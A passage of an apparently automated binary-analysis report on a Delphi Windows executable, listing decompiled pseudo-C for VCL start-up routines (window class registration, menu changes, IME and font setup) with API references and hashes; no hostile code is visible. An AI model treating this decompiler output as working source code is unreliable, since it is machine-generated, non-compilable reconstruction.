                                                                          • Part of subcall function 004418D8: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00441A17
                                                                          • Part of subcall function 004418D8: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00441A28
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                        • String ID:
                                                                        • API String ID: 3775504709-0
                                                                        • Opcode ID: 4af7d1e06e4179856b6cb7255ac9413e9ea182c3b4e7439e21792739542dd09b
                                                                        • Instruction ID: 2f7da0d823e8454f170ce9909db3841dc0363cc31ad963a92fe894f2ea070a63
                                                                        • Opcode Fuzzy Hash: 4af7d1e06e4179856b6cb7255ac9413e9ea182c3b4e7439e21792739542dd09b
                                                                        • Instruction Fuzzy Hash: C1F0497D6441809FD705FF2AFC52818B7B4E7467463A191BBF80093A32D638B981CB5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 37%
                                                                        			E004557F8(intOrPtr _a4) {
                                                                        				intOrPtr _t26;
                                                                        
                                                                        				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                                                                        				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                                                                        				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                                                                        				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                                                                        				_push(_t26); // executed
                                                                        				L00406D8C(); // executed
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                                                                        				return _t26;
                                                                        			}





                                                                        APIs
                                                                        • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00455822
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: NtdllProc_Window
                                                                        • String ID:
                                                                        • API String ID: 4255912815-0
                                                                        • Opcode ID: b07c49574a18f71dbeb9c9cb54d623c337995a7866a732a5a16d698ec8b3bfc5
                                                                        • Instruction ID: 5803e6755cc40272ac919c0989782a04df59f5dce5c0c45c60d630398e48ec52
                                                                        • Opcode Fuzzy Hash: b07c49574a18f71dbeb9c9cb54d623c337995a7866a732a5a16d698ec8b3bfc5
                                                                        • Instruction Fuzzy Hash: 44F0C579215608AFCB40DF9DC588D4AFBE8BF4C260B058195BD88CB321C234FD808F94
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 42%
                                                                        			E00455364(void* __eax, void* __ebx, void* __ecx) {
                                                                        				struct _WNDCLASSA _v44;
                                                                        				char _v48;
                                                                        				char* _t22;
                                                                        				long _t23;
                                                                        				CHAR* _t25;
                                                                        				struct HINSTANCE__* _t26;
                                                                        				intOrPtr* _t28;
                                                                        				signed int _t31;
                                                                        				intOrPtr* _t32;
                                                                        				signed int _t35;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				void* _t38;
                                                                        				CHAR* _t39;
                                                                        				struct HWND__* _t40;
                                                                        				char* _t46;
                                                                        				char* _t51;
                                                                        				long _t54;
                                                                        				long _t58;
                                                                        				struct HINSTANCE__* _t61;
                                                                        				intOrPtr _t63;
                                                                        				void* _t68;
                                                                        				struct HMENU__* _t69;
                                                                        				intOrPtr _t76;
                                                                        				void* _t82;
                                                                        				short _t87;
                                                                        
                                                                        				_v48 = 0;
                                                                        				_t68 = __eax;
                                                                        				_push(_t82);
                                                                        				_push(0x4554fb);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t82 + 0xffffffd4;
                                                                        				if( *((char*)(__eax + 0xa4)) != 0) {
                                                                        					L13:
                                                                        					_pop(_t76);
                                                                        					 *[fs:eax] = _t76;
                                                                        					_push(0x455502);
                                                                        					return E00404348( &_v48);
                                                                        				}
                                                                        				_t22 =  *0x495b34; // 0x496048
                                                                        				if( *_t22 != 0) {
                                                                        					goto L13;
                                                                        				}
                                                                        				_t23 = E0041D260(E00455880, __eax); // executed
                                                                        				 *(_t68 + 0x40) = _t23;
                                                                        				_t25 =  *0x47ac08; // 0x45504c
                                                                        				_t26 =  *0x496714; // 0x400000
                                                                        				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
                                                                        					_t61 =  *0x496714; // 0x400000
                                                                        					 *0x47abf4 = _t61;
                                                                        					_t87 = RegisterClassA(0x47abe4);
                                                                        					if(_t87 == 0) {
                                                                        						_t63 =  *0x4958e4; // 0x41d574
                                                                        						E00406548(_t63,  &_v48);
                                                                        						E0040A17C(_v48, 1);
                                                                        						E00403DA8();
                                                                        					}
                                                                        				}
                                                                        				_t28 =  *0x495998; // 0x496a9c
                                                                        				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
                                                                        				if(_t87 < 0) {
                                                                        					asm("adc eax, 0x0");
                                                                        				}
                                                                        				_t32 =  *0x495998; // 0x496a9c
                                                                        				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
                                                                        				if(_t87 < 0) {
                                                                        					asm("adc eax, 0x0");
                                                                        				}
                                                                        				_push(_t35);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_push(0);
                                                                        				_t36 =  *0x496714; // 0x400000
                                                                        				_push(_t36);
                                                                        				_push(0);
                                                                        				_t7 = _t68 + 0x8c; // 0x29c80044
                                                                        				_t38 = E004047F8( *_t7);
                                                                        				_t39 =  *0x47ac08; // 0x45504c, executed
                                                                        				_t40 = E00407340(_t39, 0x84ca0000, _t38); // executed
                                                                        				 *(_t68 + 0x30) = _t40;
                                                                        				_t9 = _t68 + 0x8c; // 0x44d55c
                                                                        				E00404348(_t9);
                                                                        				 *((char*)(_t68 + 0xa4)) = 1;
                                                                        				_t11 = _t68 + 0x40; // 0x10ac0000
                                                                        				_t12 = _t68 + 0x30; // 0xe
                                                                        				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
                                                                        				_t46 =  *0x495a04; // 0x496b70
                                                                        				if( *_t46 != 0) {
                                                                        					_t54 = E00455F58(_t68);
                                                                        					_t13 = _t68 + 0x30; // 0xe
                                                                        					SendMessageA( *_t13, 0x80, 1, _t54); // executed
                                                                        					_t58 = E00455F58(_t68);
                                                                        					_t14 = _t68 + 0x30; // 0xe
                                                                        					SetClassLongA( *_t14, 0xfffffff2, _t58); // executed
                                                                        				}
                                                                        				_t15 = _t68 + 0x30; // 0xe
                                                                        				_t69 = GetSystemMenu( *_t15, "true");
                                                                        				DeleteMenu(_t69, 0xf030, 0);
                                                                        				DeleteMenu(_t69, 0xf000, 0);
                                                                        				_t51 =  *0x495a04; // 0x496b70
                                                                        				if( *_t51 != 0) {
                                                                        					DeleteMenu(_t69, 0xf010, 0);
                                                                        				}
                                                                        				goto L13;
                                                                        			}





























                                                                        APIs
                                                                          • Part of subcall function 0041D260: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041D27E
                                                                        • GetClassInfoA.USER32 ref: 004553B9
                                                                        • RegisterClassA.USER32 ref: 004553D1
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        • SetWindowLongA.USER32 ref: 0045546D
                                                                        • SendMessageA.USER32 ref: 0045548F
                                                                        • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554A2
                                                                        • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554AD
                                                                        • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554BC
                                                                        • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554C9
                                                                        • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10AC0000,0044D4D0), ref: 004554E0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                        • String ID: H`I$LPE$pkI
                                                                        • API String ID: 2103932818-880299876
                                                                        • Opcode ID: 38e60ad4ba9bda075d6a227e52a730b6c34eac7e6b991cc39a7723496a2c1f00
                                                                        • Instruction ID: dba36a22936c401213b48a9bdafbdde789661dbc4a9e7479afdc9c550058aeec
                                                                        • Opcode Fuzzy Hash: 38e60ad4ba9bda075d6a227e52a730b6c34eac7e6b991cc39a7723496a2c1f00
                                                                        • Instruction Fuzzy Hash: A2418E707446406FE711EBA9DC92F6A33A8AB45305F154476FE04EF2E3DA78A844872D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E004418D8(void* __ebx, void* __edi, void* __eflags) {
                                                                        				char _v8;
                                                                        				char _v12;
                                                                        				char _v16;
                                                                        				char _v20;
                                                                        				char _v24;
                                                                        				long _v28;
                                                                        				char _v32;
                                                                        				char _v36;
                                                                        				intOrPtr _t25;
                                                                        				char _t29;
                                                                        				intOrPtr _t35;
                                                                        				intOrPtr _t38;
                                                                        				intOrPtr _t47;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr* _t50;
                                                                        				intOrPtr _t53;
                                                                        				struct HINSTANCE__* _t63;
                                                                        				intOrPtr* _t78;
                                                                        				intOrPtr* _t80;
                                                                        				intOrPtr _t83;
                                                                        				void* _t87;
                                                                        
                                                                        				_v20 = 0;
                                                                        				_v8 = 0;
                                                                        				_push(_t87);
                                                                        				_push(0x441a50);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t87 + 0xffffffe0;
                                                                        				_v16 = GetCurrentProcessId();
                                                                        				_v12 = 0;
                                                                        				E0040936C("Delphi%.8X", 0,  &_v16,  &_v8);
                                                                        				E0040439C(0x496b7c, _v8);
                                                                        				_t25 =  *0x496b7c; // 0x21508a8
                                                                        				 *0x496b78 = GlobalAddAtomA(E004047F8(_t25));
                                                                        				_t29 =  *0x496714; // 0x400000
                                                                        				_v36 = _t29;
                                                                        				_v32 = 0;
                                                                        				_v28 = GetCurrentThreadId();
                                                                        				_v24 = 0;
                                                                        				E0040936C("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                                                        				E0040439C(0x496b80, _v20);
                                                                        				_t35 =  *0x496b80; // 0x21508c4
                                                                        				 *0x496b7a = GlobalAddAtomA(E004047F8(_t35));
                                                                        				_t38 =  *0x496b80; // 0x21508c4
                                                                        				 *0x496b84 = RegisterClipboardFormatA(E004047F8(_t38));
                                                                        				 *0x496bbc = E00414744(1);
                                                                        				E004414DC();
                                                                        				 *0x496b6c = E00441304(1, 1);
                                                                        				_t47 = E00453F78(1, __edi);
                                                                        				_t78 =  *0x495c2c; // 0x496c08
                                                                        				 *_t78 = _t47;
                                                                        				_t49 = E0045505C(0, 1);
                                                                        				_t80 =  *0x495ad0; // 0x496c04
                                                                        				 *_t80 = _t49;
                                                                        				_t50 =  *0x495ad0; // 0x496c04
                                                                        				E00456B68( *_t50, 1);
                                                                        				_t53 =  *0x430eb0; // 0x430eb4
                                                                        				E004139C4(_t53, 0x4336c0, 0x4336d0);
                                                                        				_t63 = GetModuleHandleA("USER32");
                                                                        				if(_t63 != 0) {
                                                                        					 *0x47a8a8 = GetProcAddress(_t63, "AnimateWindow");
                                                                        				}
                                                                        				_pop(_t83);
                                                                        				 *[fs:eax] = _t83;
                                                                        				_push(0x441a57);
                                                                        				E00404348( &_v20);
                                                                        				return E00404348( &_v8);
                                                                        			}

























                                                                        APIs
                                                                        • GetCurrentProcessId.KERNEL32(?,00000000,00441A50), ref: 004418F9
                                                                        • GlobalAddAtomA.KERNEL32 ref: 0044192C
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00441947
                                                                        • GlobalAddAtomA.KERNEL32 ref: 0044197D
                                                                        • RegisterClipboardFormatA.USER32 ref: 00441993
                                                                          • Part of subcall function 00414744: RtlInitializeCriticalSection.KERNEL32(00411A90,?,?,004419A9,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00414763
                                                                          • Part of subcall function 004414DC: SetErrorMode.KERNEL32(00008000), ref: 004414F5
                                                                          • Part of subcall function 004414DC: GetModuleHandleA.KERNEL32(USER32,00000000,00441642,?,00008000), ref: 00441519
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00441526
                                                                          • Part of subcall function 004414DC: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,00441642,?,00008000), ref: 00441542
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00441564
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00441579
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 0044158E
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 004415A3
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004415B8
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004415CD
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004415E2
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004415F7
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 0044160C
                                                                          • Part of subcall function 004414DC: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00441621
                                                                          • Part of subcall function 004414DC: SetErrorMode.KERNEL32(?,00441649,00008000), ref: 0044163C
                                                                          • Part of subcall function 00453F78: GetKeyboardLayout.USER32 ref: 00453FBD
                                                                          • Part of subcall function 00453F78: 72E7AC50.USER32(00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00454012
                                                                          • Part of subcall function 00453F78: 72E7AD70.GDI32(00000000,0000005A,00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 0045401C
                                                                          • Part of subcall function 00453F78: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,00000000,?,?,00000000,?,004419D2,00000000,00000000,?,00000000,?), ref: 00454027
                                                                          • Part of subcall function 0045505C: LoadIconA.USER32(00400000,MAINICON), ref: 00455141
                                                                          • Part of subcall function 0045505C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00455173
                                                                          • Part of subcall function 0045505C: OemToCharA.USER32(?,?), ref: 00455186
                                                                          • Part of subcall function 0045505C: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 004551C6
                                                                        • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00441A17
                                                                        • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00441A28
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                                                        • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                        • API String ID: 2159221912-1126952177
                                                                        • Opcode ID: 672fa2b76e77dd81ba940745a36baf8dc5993c4f787a0357a88adb70a8aa1e99
                                                                        • Instruction ID: 0033b563d108e4a526ad8c315f1ec0427d91b7655410c97774380eaa5b0c3b7d
                                                                        • Opcode Fuzzy Hash: 672fa2b76e77dd81ba940745a36baf8dc5993c4f787a0357a88adb70a8aa1e99
                                                                        • Instruction Fuzzy Hash: 88415FB4A002459FCB00FFB5D88269D77F5EB99308B12543BE405E77A2EB39A9008B5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E0045505C(void* __ecx, char __edx) {
                                                                        				char _v5;
                                                                        				char _v261;
                                                                        				void* __ebx;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t39;
                                                                        				intOrPtr _t42;
                                                                        				intOrPtr _t43;
                                                                        				struct HINSTANCE__** _t53;
                                                                        				struct HICON__* _t55;
                                                                        				intOrPtr _t58;
                                                                        				struct HINSTANCE__** _t60;
                                                                        				void* _t67;
                                                                        				char* _t69;
                                                                        				char* _t75;
                                                                        				intOrPtr _t81;
                                                                        				intOrPtr* _t88;
                                                                        				intOrPtr* _t89;
                                                                        				intOrPtr _t90;
                                                                        				void* _t91;
                                                                        				char _t93;
                                                                        				void* _t104;
                                                                        				void* _t105;
                                                                        
                                                                        				_t93 = __edx;
                                                                        				_t91 = __ecx;
                                                                        				if(__edx != 0) {
                                                                        					_t105 = _t105 + 0xfffffff0;
                                                                        					_t39 = E00403940(_t39, _t104);
                                                                        				}
                                                                        				_v5 = _t93;
                                                                        				_t90 = _t39;
                                                                        				E0041C1DC(_t91, 0);
                                                                        				_t42 =  *0x495a48; // 0x47a468
                                                                        				if( *((short*)(_t42 + 2)) == 0) {
                                                                        					_t89 =  *0x495a48; // 0x47a468
                                                                        					 *((intOrPtr*)(_t89 + 4)) = _t90;
                                                                        					 *_t89 = 0x456690;
                                                                        				}
                                                                        				_t43 =  *0x495aec; // 0x47a470
                                                                        				_t109 =  *((short*)(_t43 + 2));
                                                                        				if( *((short*)(_t43 + 2)) == 0) {
                                                                        					_t88 =  *0x495aec; // 0x47a470
                                                                        					 *((intOrPtr*)(_t88 + 4)) = _t90;
                                                                        					 *_t88 = E00456888;
                                                                        				}
                                                                        				 *((char*)(_t90 + 0x34)) = 0;
                                                                        				 *((intOrPtr*)(_t90 + 0x90)) = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t90 + 0xa8)) = E004035AC(1);
                                                                        				 *((intOrPtr*)(_t90 + 0x60)) = 0;
                                                                        				 *((intOrPtr*)(_t90 + 0x84)) = 0;
                                                                        				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
                                                                        				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
                                                                        				 *((char*)(_t90 + 0x7c)) = 1;
                                                                        				 *((intOrPtr*)(_t90 + 0x80)) = 0;
                                                                        				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
                                                                        				 *((char*)(_t90 + 0x88)) = 0;
                                                                        				 *((char*)(_t90 + 0x9d)) = 1;
                                                                        				 *((char*)(_t90 + 0xb4)) = 1;
                                                                        				_t103 = E00425C8C(1);
                                                                        				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
                                                                        				_t53 =  *0x49597c; // 0x49602c
                                                                        				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
                                                                        				E0042605C(_t103, _t55);
                                                                        				_t20 = _t90 + 0x98; // 0x736d
                                                                        				_t58 =  *_t20;
                                                                        				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
                                                                        				 *((intOrPtr*)(_t58 + 0x10)) = 0x456df8;
                                                                        				_t60 =  *0x49597c; // 0x49602c
                                                                        				GetModuleFileNameA( *_t60,  &_v261, 0x100);
                                                                        				OemToCharA( &_v261,  &_v261);
                                                                        				_t67 = E0040ACE8(0x5c, _t109);
                                                                        				_t110 = _t67;
                                                                        				if(_t67 != 0) {
                                                                        					_t27 = _t67 + 1; // 0x1
                                                                        					E00408C34( &_v261, _t27);
                                                                        				}
                                                                        				_t69 = E0040AD10( &_v261, 0x2e, _t110);
                                                                        				if(_t69 != 0) {
                                                                        					 *_t69 = 0;
                                                                        				}
                                                                        				CharLowerA( &(( &_v261)[1]));
                                                                        				_t31 = _t90 + 0x8c; // 0x44d55c
                                                                        				E004045B0(_t31, 0x100,  &_v261);
                                                                        				_t75 =  *0x495874; // 0x496034
                                                                        				if( *_t75 == 0) {
                                                                        					E00455364(_t90, _t90, 0x100); // executed
                                                                        				}
                                                                        				 *((char*)(_t90 + 0x59)) = 1;
                                                                        				 *((char*)(_t90 + 0x5a)) = 1;
                                                                        				 *((char*)(_t90 + 0x5b)) = 1;
                                                                        				 *((char*)(_t90 + 0x9e)) = 1;
                                                                        				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
                                                                        				E00456FD4(_t90, 0x100);
                                                                        				E00457914(_t90);
                                                                        				_t81 = _t90;
                                                                        				if(_v5 != 0) {
                                                                        					E00403998(_t81);
                                                                        					_pop( *[fs:0x0]);
                                                                        				}
                                                                        				return _t90;
                                                                        			}


























                                                                        APIs
                                                                        • LoadIconA.USER32(00400000,MAINICON), ref: 00455141
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 00455173
                                                                        • OemToCharA.USER32(?,?), ref: 00455186
                                                                        • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004419E8,00000000,00000000,?,00000000,?,00000000,00441A50), ref: 004551C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Char$FileIconLoadLowerModuleName
                                                                        • String ID: ,`I$4`I$MAINICON
                                                                        • API String ID: 3935243913-2513232985
                                                                        • Opcode ID: 8dedb8289d0bfbca90d2ab047fa0c34e34e9769703f07b68c9575f29396866f2
                                                                        • Instruction ID: 7165f6ef90a4096c26261ca2b15fb1af64d1f8c3d9a5e3545fba0b08bd0ef4cb
                                                                        • Opcode Fuzzy Hash: 8dedb8289d0bfbca90d2ab047fa0c34e34e9769703f07b68c9575f29396866f2
                                                                        • Instruction Fuzzy Hash: 59515F706046449FDB41DF29C8C5B867BE4AB15308F4481BAEC48CF397D7BAD9888B69
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00454754(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                                                        				char _v5;
                                                                        				struct tagLOGFONTA _v65;
                                                                        				struct tagLOGFONTA _v185;
                                                                        				struct tagLOGFONTA _v245;
                                                                        				void _v405;
                                                                        				void* _t23;
                                                                        				int _t27;
                                                                        				void* _t30;
                                                                        				intOrPtr _t38;
                                                                        				struct HFONT__* _t41;
                                                                        				struct HFONT__* _t45;
                                                                        				struct HFONT__* _t49;
                                                                        				intOrPtr _t52;
                                                                        				intOrPtr _t54;
                                                                        				void* _t57;
                                                                        				void* _t72;
                                                                        				void* _t74;
                                                                        				void* _t75;
                                                                        				intOrPtr _t76;
                                                                        
                                                                        				_t72 = __edi;
                                                                        				_t74 = _t75;
                                                                        				_t76 = _t75 + 0xfffffe6c;
                                                                        				_t57 = __eax;
                                                                        				_v5 = 0;
                                                                        				if( *0x496c04 != 0) {
                                                                        					_t54 =  *0x496c04; // 0x2150d40
                                                                        					_v5 =  *((intOrPtr*)(_t54 + 0x88));
                                                                        				}
                                                                        				_push(_t74);
                                                                        				_push(0x454899);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t76;
                                                                        				if( *0x496c04 != 0) {
                                                                        					_t52 =  *0x496c04; // 0x2150d40
                                                                        					E00456B68(_t52, 0);
                                                                        				}
                                                                        				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                                                        					_t23 = GetStockObject(0xd);
                                                                        					_t7 = _t57 + 0x84; // 0x38004010
                                                                        					E0041F620( *_t7, _t23, _t72);
                                                                        				} else {
                                                                        					_t49 = CreateFontIndirectA( &_v65); // executed
                                                                        					_t6 = _t57 + 0x84; // 0x38004010
                                                                        					E0041F620( *_t6, _t49, _t72);
                                                                        				}
                                                                        				_v405 = 0x154;
                                                                        				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
                                                                        				if(_t27 == 0) {
                                                                        					_t14 = _t57 + 0x80; // 0xac000000
                                                                        					E0041F704( *_t14, 8);
                                                                        					_t30 = GetStockObject(0xd);
                                                                        					_t15 = _t57 + 0x88; // 0x90000000
                                                                        					E0041F620( *_t15, _t30, _t72);
                                                                        				} else {
                                                                        					_t41 = CreateFontIndirectA( &_v185);
                                                                        					_t11 = _t57 + 0x80; // 0xac000000
                                                                        					E0041F620( *_t11, _t41, _t72);
                                                                        					_t45 = CreateFontIndirectA( &_v245);
                                                                        					_t13 = _t57 + 0x88; // 0x90000000
                                                                        					E0041F620( *_t13, _t45, _t72);
                                                                        				}
                                                                        				_t16 = _t57 + 0x80; // 0xac000000
                                                                        				E0041F464( *_t16, 0x80000017);
                                                                        				_t17 = _t57 + 0x88; // 0x90000000
                                                                        				E0041F464( *_t17, 0x80000007);
                                                                        				 *[fs:eax] = 0x80000007;
                                                                        				_push(0x4548a0);
                                                                        				if( *0x496c04 != 0) {
                                                                        					_t38 =  *0x496c04; // 0x2150d40
                                                                        					return E00456B68(_t38, _v5);
                                                                        				}
                                                                        				return 0;
                                                                        			}























                                                                        APIs
                                                                        • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004547A8
                                                                        • CreateFontIndirectA.GDI32(?), ref: 004547B5
                                                                        • GetStockObject.GDI32(0000000D), ref: 004547CB
                                                                          • Part of subcall function 0041F704: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041F711
                                                                        • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004547F4
                                                                        • CreateFontIndirectA.GDI32(?), ref: 00454804
                                                                        • CreateFontIndirectA.GDI32(?), ref: 0045481D
                                                                        • GetStockObject.GDI32(0000000D), ref: 00454843
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                                                        • String ID:
                                                                        • API String ID: 2891467149-0
